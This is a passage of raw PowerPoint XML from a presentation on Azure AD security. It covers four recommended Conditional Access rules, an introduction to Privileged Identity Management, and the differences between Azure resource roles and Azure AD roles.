            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3700" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Four rules you should absolutely have when enabling Conditional Access</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3700" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3700" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60231E6F-2171-6C38-B602-A1C247332692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6222569" y="2011680"/>
            <a:ext cx="5320503" cy="3864732"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Require multi-factor authentication for all users*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Excluded break the glass accounts and workload identities (Service Principals / Service Accounts)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Require multi-factor authentication for admins*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>All Administrators should always use MFA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Block Legacy Authentication*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>For MFA to be highly affective block legacy authentication such as POP, SMTP, IMAP and MAPI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Block Access by location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Block access from countries/regions where your organization knows traffic should not come from.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>*These three rules combine security defaults which doesn’t require Azure AD Premium P1 licenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A person wearing a hat&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C1B3FC8-A69B-4D65-A82F-2230CD23B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5924" y="632446"/>
            <a:ext cx="4001315" cy="5370892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1050515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76D72-3259-4B66-AA27-7879EFFEA612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Privileged Identity Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45DED834-8167-44BB-94CC-315CFB2A00A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="667512" y="4204209"/>
            <a:ext cx="10716768" cy="1645920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementing PIM without the confusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1857764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1EA5C-1099-2C1E-7BB7-E5A09EF3D42A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Privileged Identity Management </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>What is PIM?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F2843D3-3572-BA0D-6BB7-13022BB7AFF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>PIM is an Azure AD service that enables you to manage, control and monitor access to important resources in your organization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Azure AD </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Microsoft 365</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Intune</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Requires Azure AD Premium P2 license.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>What is Privileged Identity Management? - Azure AD | Microsoft Docs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3608860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4BC0-BB0F-8A27-394B-85D3B888F4E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Privileged Identity Management</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>Common issues  - Role confusion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9CB28B3-A480-D33E-E40B-EC1EB322604C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="2011680"/>
            <a:ext cx="4976605" cy="3766185"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>What role do I need? Requesting role access.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Activating roles that are not required; Activating the user admin role instead of the user access admin role, for example.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347345" lvl="1">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Identifying what role for what scenario? Application access vs user access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347345" lvl="1">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>AD roles vs resource roles. What is the difference?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A person sitting at a desk with a computer and books&#10;&#10;Description automatically generated with low confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{244DE3FD-A997-469A-B8CA-58EB4F44126B}"/>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11304" y="1326728"/>
            <a:ext cx="5114797" cy="4345588"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1008946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4BC0-BB0F-8A27-394B-85D3B888F4E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Privileged Identity Management</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Decrypting roles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9CB28B3-A480-D33E-E40B-EC1EB322604C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676657" y="2011680"/>
            <a:ext cx="4082228" cy="3766185"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Classic subscription roles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>(azure classic deployment only)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Account admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Co-admins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Azure roles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>(RBAC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Focus on resource roles </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Four fundamental roles </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>70 resource specific roles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Azure Active Directory (Azure AD) Roles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Focus on Directory roles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Global admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>User admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="The different roles in Azure">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19855FB0-4566-4DEA-AC71-2B93C74BD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6384" y="1565976"/>
            <a:ext cx="6049686" cy="40583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8217C60-FA26-4E90-A03F-ED0E87169B04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920308" y="2477814"/>
            <a:ext cx="2858010" cy="554355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B083216-9B43-4766-882A-6E391BE07B09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2597484" y="3595143"/>
            <a:ext cx="3248900" cy="548008"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC6EBB13-905B-4721-A96E-39084E9C9262}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4414982" y="4442508"/>
            <a:ext cx="1276045" cy="1725562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383259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4BC0-BB0F-8A27-394B-85D3B888F4E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Privileged Identity Management</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Differences between Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>resource </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>roles and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Azure AD roles</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Table 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974A57C4-9A39-482F-8C0D-B3F8B8AEEFA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3471484018"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="762001" y="3186510"/>
          <a:ext cx="5491018" cy="2791950"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
